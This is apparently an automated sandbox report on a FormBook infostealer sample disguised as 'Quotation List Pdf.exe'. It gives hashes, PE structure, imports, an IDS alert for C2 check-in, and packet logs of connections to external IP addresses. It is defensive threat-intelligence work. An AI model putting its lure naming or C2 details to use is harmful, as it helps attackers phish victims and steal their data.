                                                    Encrypted:false
                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Entropy (8bit):7.055228402777836
                                                    TrID:
                                                    • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                    • Win64 Executable GUI (202006/5) 46.43%
                                                    • Win64 Executable (generic) (12005/4) 2.76%
                                                    • Generic Win/DOS Executable (2004/3) 0.46%
                                                    • DOS Executable Generic (2002/1) 0.46%
                                                    File name:Quotation List Pdf.exe
                                                    File size:2'404'352 bytes
                                                    MD5:9cfd62fc26438eeb8a50922265ad0ea7
                                                    SHA1:6bf1e9ab8b0d0c486b85649cf3bc8c1db4b21b01
                                                    SHA256:7eaa347573db3f24316a9ab2d30256db4d35105c7d93f9dbf8d860ec99949280
                                                    SHA512:44dfe12929105d92bd1b1613ba10b3196030887b784727f646b9b17aabde242b65b87c41a9227103ab8ccb55d5163ecb5115283435b51855dc847da47e699e95
                                                    SSDEEP:49152:EF50a6aPVOFMx3SmroCZscivbS6mqxEWoKmqZJffp3vSsqPUceaw1GwNOmExG6f:2roA7PdsE86f
                                                    TLSH:2AB5AD15E3E802A8D877E634CA62A333DBB078961730D58F0659D6552F73EA19B3F312
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..Ec...c...c....v..j....v..n....v..M...j.D.m...(...h...c...n....w..k....w..b...c...b....w..$...pq..b...pq..b...Richc..........

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x14006b3dc
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x140000000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x667DA332 [Thu Jun 27 17:36:50 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:97f00b2383bd4369e5094078fdccae7a

                                                    Entrypoint Preview

                                                    Instruction
                                                    dec eax
                                                    sub esp, 28h
                                                    call 00007FBAB95C5710h
                                                    dec eax
                                                    add esp, 28h
                                                    jmp 00007FBAB95C4F57h
                                                    int3
                                                    int3
                                                    jmp 00007FBAB95C5A8Ch
                                                    int3
                                                    int3
                                                    int3
                                                    dec eax
                                                    sub esp, 28h
                                                    dec ebp
                                                    mov eax, dword ptr [ecx+38h]
                                                    dec eax
                                                    mov ecx, edx
                                                    dec ecx
                                                    mov edx, ecx
                                                    call 00007FBAB95C50F2h
                                                    mov eax, 00000001h
                                                    dec eax
                                                    add esp, 28h
                                                    ret
                                                    int3
                                                    int3
                                                    int3
                                                    inc eax
                                                    push ebx
                                                    inc ebp
                                                    mov ebx, dword ptr [eax]
                                                    dec eax
                                                    mov ebx, edx
                                                    inc ecx
                                                    and ebx, FFFFFFF8h
                                                    dec esp
                                                    mov ecx, ecx
                                                    inc ecx
                                                    test byte ptr [eax], 00000004h
                                                    dec esp
                                                    mov edx, ecx
                                                    je 00007FBAB95C50F5h
                                                    inc ecx
                                                    mov eax, dword ptr [eax+08h]
                                                    dec ebp
                                                    arpl word ptr [eax+04h], dx
                                                    neg eax
                                                    dec esp
                                                    add edx, ecx
                                                    dec eax
                                                    arpl ax, cx
                                                    dec esp
                                                    and edx, ecx
                                                    dec ecx
                                                    arpl bx, ax
                                                    dec edx
                                                    mov edx, dword ptr [eax+edx]
                                                    dec eax
                                                    mov eax, dword ptr [ebx+10h]
                                                    mov ecx, dword ptr [eax+08h]
                                                    dec eax
                                                    mov eax, dword ptr [ebx+08h]
                                                    test byte ptr [ecx+eax+03h], 0000000Fh
                                                    je 00007FBAB95C50EDh
                                                    movzx eax, byte ptr [ecx+eax+03h]
                                                    and eax, FFFFFFF0h
                                                    dec esp
                                                    add ecx, eax
                                                    dec esp
                                                    xor ecx, edx
                                                    dec ecx
                                                    mov ecx, ecx
                                                    pop ebx
                                                    jmp 00007FBAB95C5102h
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    int3
                                                    nop word ptr [eax+eax+00000000h]
                                                    dec eax
                                                    cmp ecx, dword ptr [001D73A9h]
                                                    jne 00007FBAB95C50F2h
                                                    dec eax
                                                    rol ecx, 10h
                                                    test cx, FFFFh
                                                    jne 00007FBAB95C50E3h

                                                    Rich Headers

                                                    Programming Language:
                                                    • [IMP] VS2008 SP1 build 30729

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x23ec600x58.rdata
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x23ecb80x104.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2640000x42d00.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2500000x1368c.pdata
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a70000x5ec.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x2166000x54.rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x2168000x28.rdata
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2164c00x140.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x1980000x818.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x6fef80x70000dd316bc2c65b1ae399457fdba120fa82False0.45282200404575895data6.641185225824904IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .managed0x710000xd9b180xd9c0074b435642e339cdb1b2a678eb60c92d8False0.4628401711394948data6.464502436229499IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    hydrated0x14b0000x4c5400x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rdata0x1980000xa89e40xa8a00174da103699e4289a823ec96074735e3False0.4893048670311342data6.721017459912897IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x2410000xe6680x1a00f7893d3998d6fe23c3c2fd83a455cf8dFalse0.22581129807692307data3.2697501080046183IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .pdata0x2500000x1368c0x13800e5aeded247d82c5d18901a5f5b1c4999False0.49800931490384615data6.163194359627306IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .rsrc0x2640000x42d000x42e00880bdc6cc5d6f12bb00e0f20037bc601False0.9967180198598131data7.998224918950355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x2a70000x5ec0x60022b17bd43d0ff4894ef88b7e105d8348False0.5989583333333334data5.299377162126531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    BINARY0x26412c0x42684data1.000334553903619
                                                    RT_VERSION0x2a67b00x364data0.37327188940092165
                                                    RT_MANIFEST0x2a6b140x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                    Imports

                                                    DLLImport
                                                    ADVAPI32.dllAdjustTokenPrivileges, CreateWellKnownSid, DeregisterEventSource, DuplicateTokenEx, GetSecurityDescriptorLength, GetTokenInformation, GetWindowsAccountDomainSid, LookupPrivilegeValueW, OpenProcessToken, OpenThreadToken, RegCloseKey, RegCreateKeyExW, RegDeleteKeyExW, RegDeleteTreeW, RegDeleteValueW, RegEnumKeyExW, RegEnumValueW, RegFlushKey, RegOpenKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegSetValueExA, RegSetValueExW, RegisterEventSourceW, ReportEventW, RevertToSelf, SetThreadToken
                                                    bcrypt.dllBCryptDestroyKey, BCryptEncrypt, BCryptGenRandom, BCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptDecrypt, BCryptCloseAlgorithmProvider, BCryptImportKey
                                                    KERNEL32.dllTlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, RaiseException, RtlPcToFileHeader, AllocConsole, CancelThreadpoolIo, CloseHandle, CloseThreadpoolIo, CompareStringEx, CompareStringOrdinal, CopyFileExW, CreateDirectoryW, CreateEventExW, CreateFileW, CreateProcessA, CreateSymbolicLinkW, CreateThreadpoolIo, DeleteCriticalSection, DeleteFileW, DeleteVolumeMountPointW, DeviceIoControl, DuplicateHandle, EnterCriticalSection, EnumCalendarInfoExEx, EnumTimeFormatsEx, ExitProcess, ExpandEnvironmentStringsW, FileTimeToSystemTime, FindClose, FindFirstFileExW, FindNLSStringEx, FindNextFileW, FindStringOrdinal, FlushFileBuffers, FormatMessageW, FreeConsole, FreeLibrary, GetCPInfo, GetCalendarInfoEx, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentProcessorNumberEx, GetCurrentThread, GetDynamicTimeZoneInformation, GetEnvironmentVariableW, GetFileAttributesExW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileType, GetFinalPathNameByHandleW, GetFullPathNameW, GetLastError, GetLocaleInfoEx, GetLogicalDrives, GetLongPathNameW, GetModuleFileNameW, GetModuleHandleA, GetOverlappedResult, GetProcAddress, GetStdHandle, GetSystemDirectoryW, GetSystemTime, GetThreadPriority, GetTickCount64, GetTimeZoneInformation, GetUserPreferredUILanguages, GetVolumeInformationW, InitializeConditionVariable, InitializeCriticalSection, IsDebuggerPresent, LCMapStringEx, LeaveCriticalSection, LoadLibraryExW, LocalAlloc, LocalFree, LocaleNameToLCID, MoveFileExW, MultiByteToWideChar, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseFailFastException, ReadFile, RemoveDirectoryW, ReplaceFileW, ResetEvent, ResolveLocaleName, ResumeThread, SetEvent, SetFileAttributesW, SetFileInformationByHandle, SetLastError, SetThreadErrorMode, SetThreadPriority, Sleep, SleepConditionVariableCS, StartThreadpoolIo, SystemTimeToFileTime, TzSpecificLocalTimeToSystemTime, VirtualAlloc, VirtualFree, WaitForMultipleObjectsEx, WakeConditionVariable, WideCharToMultiByte, WriteFile, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, VerSetConditionMask, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, CreateThread, GetCurrentThreadId, SuspendThread, GetThreadContext, SetThreadContext, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, VerifyVersionInfoW, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, VirtualQuery, GetSystemTimeAsFileTime, InitializeCriticalSectionEx, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RtlUnwindEx, InitializeSListHead, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlLookupFunctionEntry
                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CoUninitialize, CoWaitForMultipleHandles, CoInitializeEx, CoCreateGuid, CoGetApartmentType
                                                    USER32.dllLoadStringW
                                                    api-ms-win-crt-math-l1-1-0.dll__setusermatherr, floor, pow, modf, sin, cos, ceil, tan
                                                    api-ms-win-crt-heap-l1-1-0.dllfree, calloc, _set_new_mode, malloc, _callnewh
                                                    api-ms-win-crt-string-l1-1-0.dllstrncpy_s, strcpy_s, _stricmp, wcsncmp, strcmp
                                                    api-ms-win-crt-convert-l1-1-0.dllstrtoull
                                                    api-ms-win-crt-runtime-l1-1-0.dll_register_thread_local_exe_atexit_callback, _c_exit, _cexit, __p___wargv, __p___argc, _exit, exit, _initterm_e, terminate, _crt_atexit, _initterm, _register_onexit_function, _get_initial_wide_environment, abort, _initialize_onexit_table, _initialize_wide_environment, _configure_wide_argv, _seh_filter_exe, _set_app_type
                                                    api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vsscanf, __p__commode, __acrt_iob_func, __stdio_common_vfprintf, __stdio_common_vsprintf_s, _set_fmode
                                                    api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                                    Exports

                                                    NameOrdinalAddress
                                                    DotNetRuntimeDebugHeader10x140241d50

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    07/01/24-15:45:01.553785TCP2856318ETPRO TROJAN FormBook CnC Checkin (POST) M44971380192.168.2.83.33.244.179

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 1, 2024 15:44:45.822089911 CEST4971280192.168.2.8188.114.97.3
                                                    Jul 1, 2024 15:44:45.827239037 CEST8049712188.114.97.3192.168.2.8
                                                    Jul 1, 2024 15:44:45.827322006 CEST4971280192.168.2.8188.114.97.3
                                                    Jul 1, 2024 15:44:45.829499006 CEST4971280192.168.2.8188.114.97.3
                                                    Jul 1, 2024 15:44:45.834343910 CEST8049712188.114.97.3192.168.2.8
                                                    Jul 1, 2024 15:44:46.319389105 CEST8049712188.114.97.3192.168.2.8
                                                    Jul 1, 2024 15:44:46.319770098 CEST8049712188.114.97.3192.168.2.8
                                                    Jul 1, 2024 15:44:46.319886923 CEST4971280192.168.2.8188.114.97.3
                                                    Jul 1, 2024 15:44:46.322578907 CEST4971280192.168.2.8188.114.97.3
                                                    Jul 1, 2024 15:44:46.327471972 CEST8049712188.114.97.3192.168.2.8
                                                    Jul 1, 2024 15:45:01.546890974 CEST4971380192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:01.551830053 CEST80497133.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:01.551975965 CEST4971380192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:01.553785086 CEST4971380192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:01.559006929 CEST80497133.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:02.049556017 CEST80497133.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:02.049650908 CEST4971380192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:03.069497108 CEST4971380192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:03.074464083 CEST80497133.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:04.088026047 CEST4971480192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:04.092858076 CEST80497143.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:04.092991114 CEST4971480192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:04.094849110 CEST4971480192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:04.099618912 CEST80497143.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:04.588063002 CEST80497143.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:04.588165045 CEST4971480192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:05.601386070 CEST4971480192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:05.606271029 CEST80497143.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:06.619491100 CEST4971580192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:06.624461889 CEST80497153.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:06.624562979 CEST4971580192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:06.626580000 CEST4971580192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:06.631393909 CEST80497153.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:06.631455898 CEST80497153.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:07.989743948 CEST80497153.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:07.989829063 CEST4971580192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:07.990323067 CEST80497153.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:07.990381002 CEST4971580192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:07.990439892 CEST80497153.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:07.990508080 CEST4971580192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:07.991115093 CEST80497153.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:07.991173029 CEST4971580192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:08.132050037 CEST4971580192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:08.138401031 CEST80497153.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:09.150764942 CEST4971680192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:09.155693054 CEST80497163.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:09.155806065 CEST4971680192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:09.157557964 CEST4971680192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:09.162318945 CEST80497163.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:10.227319956 CEST80497163.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:10.227341890 CEST80497163.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:10.227350950 CEST80497163.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:10.227545977 CEST4971680192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:10.227592945 CEST80497163.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:10.227642059 CEST4971680192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:10.229948997 CEST4971680192.168.2.83.33.244.179
                                                    Jul 1, 2024 15:45:10.234812975 CEST80497163.33.244.179192.168.2.8
                                                    Jul 1, 2024 15:45:15.562760115 CEST4971780192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:15.567914963 CEST8049717203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:15.568028927 CEST4971780192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:15.569847107 CEST4971780192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:15.574692011 CEST8049717203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:16.198968887 CEST8049717203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:16.199075937 CEST8049717203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:16.199160099 CEST4971780192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:17.085232973 CEST4971780192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:18.103558064 CEST4971980192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:18.108688116 CEST8049719203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:18.108792067 CEST4971980192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:18.110457897 CEST4971980192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:18.115262985 CEST8049719203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:18.702887058 CEST8049719203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:18.702970028 CEST8049719203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:18.703090906 CEST4971980192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:19.616357088 CEST4971980192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:20.634924889 CEST4972080192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:20.641040087 CEST8049720203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:20.641181946 CEST4972080192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:20.643012047 CEST4972080192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:20.648118019 CEST8049720203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:20.648130894 CEST8049720203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:21.264017105 CEST8049720203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:21.264044046 CEST8049720203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:21.264202118 CEST4972080192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:22.149028063 CEST4972080192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:23.166465998 CEST4972180192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:23.171730995 CEST8049721203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:23.172342062 CEST4972180192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:23.177057028 CEST4972180192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:23.182271957 CEST8049721203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:23.783843994 CEST8049721203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:23.784427881 CEST8049721203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:23.785171032 CEST4972180192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:23.787134886 CEST4972180192.168.2.8203.161.41.207
                                                    Jul 1, 2024 15:45:23.792028904 CEST8049721203.161.41.207192.168.2.8
                                                    Jul 1, 2024 15:45:28.817827940 CEST4972280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:28.827517033 CEST80497223.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:28.827605009 CEST4972280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:28.829322100 CEST4972280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:28.834135056 CEST80497223.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:29.321751118 CEST80497223.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:29.321890116 CEST4972280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:30.335506916 CEST4972280192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:30.341969967 CEST80497223.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:31.353832006 CEST4972380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:31.366008997 CEST80497233.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:31.366102934 CEST4972380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:31.367974997 CEST4972380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:31.372952938 CEST80497233.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:31.853035927 CEST80497233.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:31.853312969 CEST4972380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:32.882414103 CEST4972380192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:32.887672901 CEST80497233.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:33.901151896 CEST4972480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:33.909184933 CEST80497243.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:33.909323931 CEST4972480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:33.911138058 CEST4972480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:33.923573971 CEST80497243.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:33.923609018 CEST80497243.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:34.402596951 CEST80497243.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:34.402712107 CEST4972480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:35.413239002 CEST4972480192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:35.418401003 CEST80497243.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:36.431696892 CEST4972580192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:36.436892033 CEST80497253.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:36.436980009 CEST4972580192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:36.438674927 CEST4972580192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:36.444324017 CEST80497253.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:36.905607939 CEST80497253.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:36.905673981 CEST80497253.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:36.905826092 CEST4972580192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:36.911461115 CEST4972580192.168.2.83.33.130.190
                                                    Jul 1, 2024 15:45:36.916310072 CEST80497253.33.130.190192.168.2.8
                                                    Jul 1, 2024 15:45:42.288244009 CEST4972780192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:42.293704987 CEST804972738.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:42.293793917 CEST4972780192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:42.295532942 CEST4972780192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:42.300584078 CEST804972738.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:43.212255001 CEST804972738.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:43.212750912 CEST804972738.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:43.214348078 CEST4972780192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:43.804018974 CEST4972780192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:44.830933094 CEST4972880192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:44.835946083 CEST804972838.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:44.836050034 CEST4972880192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:44.838224888 CEST4972880192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:44.848504066 CEST804972838.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:45.833457947 CEST804972838.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:45.833481073 CEST804972838.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:45.833492041 CEST804972838.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:45.833646059 CEST4972880192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:46.350929976 CEST4972880192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:47.369198084 CEST4972980192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:47.374399900 CEST804972938.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:47.374566078 CEST4972980192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:47.376334906 CEST4972980192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:47.381391048 CEST804972938.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:47.381443024 CEST804972938.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:48.313740015 CEST804972938.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:48.313827038 CEST804972938.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:48.314495087 CEST4972980192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:48.882047892 CEST4972980192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:49.902262926 CEST4973080192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:49.907386065 CEST804973038.47.232.185192.168.2.8
                                                    Jul 1, 2024 15:45:49.910537958 CEST4973080192.168.2.838.47.232.185
                                                    Jul 1, 2024 15:45:49.913324118 CEST4973080192.168.2.838.47.232.185
